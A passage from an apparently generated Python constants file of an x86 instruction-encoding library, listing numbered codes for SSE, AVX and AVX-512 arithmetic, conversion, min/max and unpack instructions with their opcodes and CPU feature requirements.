``16/32/64-bit``
"""
VEX_VMULPD_XMM_XMM_XMMM128: int = 1361
"""
``VMULPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMULPD_YMM_YMM_YMMM256: int = 1362
"""
``VMULPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULPD_XMM_K1Z_XMM_XMMM128B64: int = 1363
"""
``VMULPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPD_YMM_K1Z_YMM_YMMM256B64: int = 1364
"""
``VMULPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 59 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMULPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1365
"""
``VMULPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 59 /r``
``AVX512F``
``16/32/64-bit``
"""
MULSS_XMM_XMMM32: int = 1366
"""
``MULSS xmm1, xmm2/m32``
``F3 0F 59 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMULSS_XMM_XMM_XMMM32: int = 1367
"""
``VMULSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULSS_XMM_K1Z_XMM_XMMM32_ER: int = 1368
"""
``VMULSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 59 /r``
``AVX512F``
``16/32/64-bit``
"""
MULSD_XMM_XMMM64: int = 1369
"""
``MULSD xmm1, xmm2/m64``
``F2 0F 59 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMULSD_XMM_XMM_XMMM64: int = 1370
"""
``VMULSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 59 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMULSD_XMM_K1Z_XMM_XMMM64_ER: int = 1371
"""
``VMULSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 59 /r``
``AVX512F``
``16/32/64-bit``
"""
CVTPS2PD_XMM_XMMM64: int = 1372
"""
``CVTPS2PD xmm1, xmm2/m64``
``NP 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPS2PD_XMM_XMMM64: int = 1373
"""
``VCVTPS2PD xmm1, xmm2/m64``
``VEX.128.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPS2PD_YMM_XMMM128: int = 1374
"""
``VCVTPS2PD ymm1, xmm2/m128``
``VEX.256.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPS2PD_XMM_K1Z_XMMM64B32: int = 1375
"""
``VCVTPS2PD xmm1 {k1}{z}, xmm2/m64/m32bcst``
``EVEX.128.0F.W0 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PD_YMM_K1Z_XMMM128B32: int = 1376
"""
``VCVTPS2PD ymm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.256.0F.W0 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PD_ZMM_K1Z_YMMM256B32_SAE: int = 1377
"""
``VCVTPS2PD zmm1 {k1}{z}, ymm2/m256/m32bcst{sae}``
``EVEX.512.0F.W0 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTPD2PS_XMM_XMMM128: int = 1378
"""
``CVTPD2PS xmm1, xmm2/m128``
``66 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPD2PS_XMM_XMMM128: int = 1379
"""
``VCVTPD2PS xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPD2PS_XMM_YMMM256: int = 1380
"""
``VCVTPD2PS xmm1, ymm2/m256``
``VEX.256.66.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPD2PS_XMM_K1Z_XMMM128B64: int = 1381
"""
``VCVTPD2PS xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2PS_XMM_K1Z_YMMM256B64: int = 1382
"""
``VCVTPD2PS xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 5A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPD2PS_YMM_K1Z_ZMMM512B64_ER: int = 1383
"""
``VCVTPD2PS ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTSS2SD_XMM_XMMM32: int = 1384
"""
``CVTSS2SD xmm1, xmm2/m32``
``F3 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTSS2SD_XMM_XMM_XMMM32: int = 1385
"""
``VCVTSS2SD xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTSS2SD_XMM_K1Z_XMM_XMMM32_SAE: int = 1386
"""
``VCVTSS2SD xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.F3.0F.W0 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTSD2SS_XMM_XMMM64: int = 1387
"""
``CVTSD2SS xmm1, xmm2/m64``
``F2 0F 5A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTSD2SS_XMM_XMM_XMMM64: int = 1388
"""
``VCVTSD2SS xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTSD2SS_XMM_K1Z_XMM_XMMM64_ER: int = 1389
"""
``VCVTSD2SS xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 5A /r``
``AVX512F``
``16/32/64-bit``
"""
CVTDQ2PS_XMM_XMMM128: int = 1390
"""
``CVTDQ2PS xmm1, xmm2/m128``
``NP 0F 5B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTDQ2PS_XMM_XMMM128: int = 1391
"""
``VCVTDQ2PS xmm1, xmm2/m128``
``VEX.128.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTDQ2PS_YMM_YMMM256: int = 1392
"""
``VCVTDQ2PS ymm1, ymm2/m256``
``VEX.256.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PS_XMM_K1Z_XMMM128B32: int = 1393
"""
``VCVTDQ2PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PS_YMM_K1Z_YMMM256B32: int = 1394
"""
``VCVTDQ2PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1395
"""
``VCVTDQ2PS zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.0F.W0 5B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PS_XMM_K1Z_XMMM128B64: int = 1396
"""
``VCVTQQ2PS xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.0F.W1 5B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PS_XMM_K1Z_YMMM256B64: int = 1397
"""
``VCVTQQ2PS xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.0F.W1 5B /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1398
"""
``VCVTQQ2PS ymm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.0F.W1 5B /r``
``AVX512DQ``
``16/32/64-bit``
"""
CVTPS2DQ_XMM_XMMM128: int = 1399
"""
``CVTPS2DQ xmm1, xmm2/m128``
``66 0F 5B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTPS2DQ_XMM_XMMM128: int = 1400
"""
``VCVTPS2DQ xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTPS2DQ_YMM_YMMM256: int = 1401
"""
``VCVTPS2DQ ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTPS2DQ_XMM_K1Z_XMMM128B32: int = 1402
"""
``VCVTPS2DQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2DQ_YMM_K1Z_YMMM256B32: int = 1403
"""
``VCVTPS2DQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2DQ_ZMM_K1Z_ZMMM512B32_ER: int = 1404
"""
``VCVTPS2DQ zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.66.0F.W0 5B /r``
``AVX512F``
``16/32/64-bit``
"""
CVTTPS2DQ_XMM_XMMM128: int = 1405
"""
``CVTTPS2DQ xmm1, xmm2/m128``
``F3 0F 5B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCVTTPS2DQ_XMM_XMMM128: int = 1406
"""
``VCVTTPS2DQ xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTPS2DQ_YMM_YMMM256: int = 1407
"""
``VCVTTPS2DQ ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 5B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCVTTPS2DQ_XMM_K1Z_XMMM128B32: int = 1408
"""
``VCVTTPS2DQ xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F3.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2DQ_YMM_K1Z_YMMM256B32: int = 1409
"""
``VCVTTPS2DQ ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F3.0F.W0 5B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTPS2DQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1410
"""
``VCVTTPS2DQ zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.F3.0F.W0 5B /r``
``AVX512F``
``16/32/64-bit``
"""
SUBPS_XMM_XMMM128: int = 1411
"""
``SUBPS xmm1, xmm2/m128``
``NP 0F 5C /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSUBPS_XMM_XMM_XMMM128: int = 1412
"""
``VSUBPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSUBPS_YMM_YMM_YMMM256: int = 1413
"""
``VSUBPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBPS_XMM_K1Z_XMM_XMMM128B32: int = 1414
"""
``VSUBPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPS_YMM_K1Z_YMM_YMMM256B32: int = 1415
"""
``VSUBPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1416
"""
``VSUBPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 5C /r``
``AVX512F``
``16/32/64-bit``
"""
SUBPD_XMM_XMMM128: int = 1417
"""
``SUBPD xmm1, xmm2/m128``
``66 0F 5C /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSUBPD_XMM_XMM_XMMM128: int = 1418
"""
``VSUBPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSUBPD_YMM_YMM_YMMM256: int = 1419
"""
``VSUBPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBPD_XMM_K1Z_XMM_XMMM128B64: int = 1420
"""
``VSUBPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPD_YMM_K1Z_YMM_YMMM256B64: int = 1421
"""
``VSUBPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSUBPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1422
"""
``VSUBPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 5C /r``
``AVX512F``
``16/32/64-bit``
"""
SUBSS_XMM_XMMM32: int = 1423
"""
``SUBSS xmm1, xmm2/m32``
``F3 0F 5C /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSUBSS_XMM_XMM_XMMM32: int = 1424
"""
``VSUBSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBSS_XMM_K1Z_XMM_XMMM32_ER: int = 1425
"""
``VSUBSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 5C /r``
``AVX512F``
``16/32/64-bit``
"""
SUBSD_XMM_XMMM64: int = 1426
"""
``SUBSD xmm1, xmm2/m64``
``F2 0F 5C /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSUBSD_XMM_XMM_XMMM64: int = 1427
"""
``VSUBSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSUBSD_XMM_K1Z_XMM_XMMM64_ER: int = 1428
"""
``VSUBSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 5C /r``
``AVX512F``
``16/32/64-bit``
"""
MINPS_XMM_XMMM128: int = 1429
"""
``MINPS xmm1, xmm2/m128``
``NP 0F 5D /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMINPS_XMM_XMM_XMMM128: int = 1430
"""
``VMINPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMINPS_YMM_YMM_YMMM256: int = 1431
"""
``VMINPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINPS_XMM_K1Z_XMM_XMMM128B32: int = 1432
"""
``VMINPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPS_YMM_K1Z_YMM_YMMM256B32: int = 1433
"""
``VMINPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1434
"""
``VMINPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}``
``EVEX.512.0F.W0 5D /r``
``AVX512F``
``16/32/64-bit``
"""
MINPD_XMM_XMMM128: int = 1435
"""
``MINPD xmm1, xmm2/m128``
``66 0F 5D /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMINPD_XMM_XMM_XMMM128: int = 1436
"""
``VMINPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMINPD_YMM_YMM_YMMM256: int = 1437
"""
``VMINPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINPD_XMM_K1Z_XMM_XMMM128B64: int = 1438
"""
``VMINPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPD_YMM_K1Z_YMM_YMMM256B64: int = 1439
"""
``VMINPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMINPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1440
"""
``VMINPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 5D /r``
``AVX512F``
``16/32/64-bit``
"""
MINSS_XMM_XMMM32: int = 1441
"""
``MINSS xmm1, xmm2/m32``
``F3 0F 5D /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMINSS_XMM_XMM_XMMM32: int = 1442
"""
``VMINSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1443
"""
``VMINSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.F3.0F.W0 5D /r``
``AVX512F``
``16/32/64-bit``
"""
MINSD_XMM_XMMM64: int = 1444
"""
``MINSD xmm1, xmm2/m64``
``F2 0F 5D /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMINSD_XMM_XMM_XMMM64: int = 1445
"""
``VMINSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMINSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1446
"""
``VMINSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.F2.0F.W1 5D /r``
``AVX512F``
``16/32/64-bit``
"""
DIVPS_XMM_XMMM128: int = 1447
"""
``DIVPS xmm1, xmm2/m128``
``NP 0F 5E /r``
``SSE``
``16/32/64-bit``
"""
VEX_VDIVPS_XMM_XMM_XMMM128: int = 1448
"""
``VDIVPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VDIVPS_YMM_YMM_YMMM256: int = 1449
"""
``VDIVPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVPS_XMM_K1Z_XMM_XMMM128B32: int = 1450
"""
``VDIVPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPS_YMM_K1Z_YMM_YMMM256B32: int = 1451
"""
``VDIVPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1452
"""
``VDIVPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.0F.W0 5E /r``
``AVX512F``
``16/32/64-bit``
"""
DIVPD_XMM_XMMM128: int = 1453
"""
``DIVPD xmm1, xmm2/m128``
``66 0F 5E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VDIVPD_XMM_XMM_XMMM128: int = 1454
"""
``VDIVPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VDIVPD_YMM_YMM_YMMM256: int = 1455
"""
``VDIVPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVPD_XMM_K1Z_XMM_XMMM128B64: int = 1456
"""
``VDIVPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPD_YMM_K1Z_YMM_YMMM256B64: int = 1457
"""
``VDIVPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VDIVPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1458
"""
``VDIVPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 5E /r``
``AVX512F``
``16/32/64-bit``
"""
DIVSS_XMM_XMMM32: int = 1459
"""
``DIVSS xmm1, xmm2/m32``
``F3 0F 5E /r``
``SSE``
``16/32/64-bit``
"""
VEX_VDIVSS_XMM_XMM_XMMM32: int = 1460
"""
``VDIVSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVSS_XMM_K1Z_XMM_XMMM32_ER: int = 1461
"""
``VDIVSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 5E /r``
``AVX512F``
``16/32/64-bit``
"""
DIVSD_XMM_XMMM64: int = 1462
"""
``DIVSD xmm1, xmm2/m64``
``F2 0F 5E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VDIVSD_XMM_XMM_XMMM64: int = 1463
"""
``VDIVSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVSD_XMM_K1Z_XMM_XMMM64_ER: int = 1464
"""
``VDIVSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 5E /r``
``AVX512F``
``16/32/64-bit``
"""
MAXPS_XMM_XMMM128: int = 1465
"""
``MAXPS xmm1, xmm2/m128``
``NP 0F 5F /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMAXPS_XMM_XMM_XMMM128: int = 1466
"""
``VMAXPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMAXPS_YMM_YMM_YMMM256: int = 1467
"""
``VMAXPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXPS_XMM_K1Z_XMM_XMMM128B32: int = 1468
"""
``VMAXPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPS_YMM_K1Z_YMM_YMMM256B32: int = 1469
"""
``VMAXPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1470
"""
``VMAXPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}``
``EVEX.512.0F.W0 5F /r``
``AVX512F``
``16/32/64-bit``
"""
MAXPD_XMM_XMMM128: int = 1471
"""
``MAXPD xmm1, xmm2/m128``
``66 0F 5F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMAXPD_XMM_XMM_XMMM128: int = 1472
"""
``VMAXPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMAXPD_YMM_YMM_YMMM256: int = 1473
"""
``VMAXPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXPD_XMM_K1Z_XMM_XMMM128B64: int = 1474
"""
``VMAXPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPD_YMM_K1Z_YMM_YMMM256B64: int = 1475
"""
``VMAXPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1476
"""
``VMAXPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 5F /r``
``AVX512F``
``16/32/64-bit``
"""
MAXSS_XMM_XMMM32: int = 1477
"""
``MAXSS xmm1, xmm2/m32``
``F3 0F 5F /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMAXSS_XMM_XMM_XMMM32: int = 1478
"""
``VMAXSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1479
"""
``VMAXSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.F3.0F.W0 5F /r``
``AVX512F``
``16/32/64-bit``
"""
MAXSD_XMM_XMMM64: int = 1480
"""
``MAXSD xmm1, xmm2/m64``
``F2 0F 5F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMAXSD_XMM_XMM_XMMM64: int = 1481
"""
``VMAXSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1482
"""
``VMAXSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.F2.0F.W1 5F /r``
``AVX512F``
``16/32/64-bit``
"""
PUNPCKLBW_MM_MMM32: int = 1483
"""
``PUNPCKLBW mm, mm/m32``
``NP 0F 60 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKLBW_XMM_XMMM128: int = 1484
"""
``PUNPCKLBW xmm1, xmm2/m128``
``66 0F 60 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLBW_XMM_XMM_XMMM128: int = 1485
"""
``VPUNPCKLBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 60 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLBW_YMM_YMM_YMMM256: int = 1486
"""
``VPUNPCKLBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 60 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLBW_XMM_K1Z_XMM_XMMM128: int = 1487
"""
``VPUNPCKLBW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 60 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLBW_YMM_K1Z_YMM_YMMM256: int = 1488
"""
``VPUNPCKLBW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 60 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLBW_ZMM_K1Z_ZMM_ZMMM512: int = 1489
"""
``VPUNPCKLBW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 60 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKLWD_MM_MMM32: int = 1490
"""
``PUNPCKLWD mm, mm/m32``
``NP 0F 61 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKLWD_XMM_XMMM128: int = 1491
"""
``PUNPCKLWD xmm1, xmm2/m128``
``66 0F 61 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLWD_XMM_XMM_XMMM128: int = 1492
"""
``VPUNPCKLWD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 61 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLWD_YMM_YMM_YMMM256: int = 1493
"""
``VPUNPCKLWD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 61 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLWD_XMM_K1Z_XMM_XMMM128: int = 1494
"""
``VPUNPCKLWD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 61 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLWD_YMM_K1Z_YMM_YMMM256: int = 1495
"""
``VPUNPCKLWD ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 61 /r``
``AVX512VL and AVX512BW``
